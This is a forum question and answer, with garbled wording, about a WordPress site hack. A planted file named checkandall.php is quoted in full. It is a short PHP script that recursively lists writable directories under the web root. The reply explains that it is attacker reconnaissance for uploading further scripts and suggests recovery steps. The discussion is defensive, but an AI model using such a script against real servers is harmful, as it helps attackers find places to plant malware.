checkandall.php added to WordPress root directory -
after logging 1 of wordpress sites today, securi plugin has reported following files added:
01/04/2015 - new file added checkandall.php (size: 592)
this sits on root of server , contains following code:
<?php error_reporting(0); function getlistfiles($folder,&$all_files){ $fp=opendir($folder); while($cv_file=readdir($fp)) { if(is_file($folder."/".$cv_file)) { if(is_writable($folder)){ $all_files[]=$folder."/*"; } }elseif($cv_file!="." && $cv_file!=".." && is_dir($folder."/".$cv_file)){ getlistfiles($folder."/".$cv_file,$all_files); } } closedir($fp); } $all_files=array(); getlistfiles("/var/sites/w/www.mydomain/public_html/",$all_files); $result = array_unique($all_files); print_r($result); ?>
can more php experience please explain doing? assume it's file has been injected monitor rest of wordpress site.
other actions concern me:
01/04/2015 - plugin deleted: php code posts (v1.2.0; php-code-for-posts/phppostcode.php) - not actioned me
01/04/2015 - plugin deactivated: sucuri security - auditing, malware scanner , hardening - not actioned me
01/04/2015 - media file added; identifier: 328; name: maink.php; type. - not actioned me
01/04/2015 - plugin installed: maink.php - not actioned me
luckily, host daily, offsite backups, can restore. i'm curious understand how happened , effect of hack be.
this script getting list of files in directories specific base directory("/var/sites/w/www.mydomain/public_html/") in case, , prints list of directories writeable screen. attacker find places upload new scripts to, use perform further attacks.
it looks got administrative access wordpress site , using upload other scripts more damage. plugin installed opens further vulnerabilities attacker exploit. take server offline, restore backups, change database , wordpress admin credentials, update wordpress latest version.
take @ this: http://www-personal.umich.edu/~markmont/awp/
Comments
Post a Comment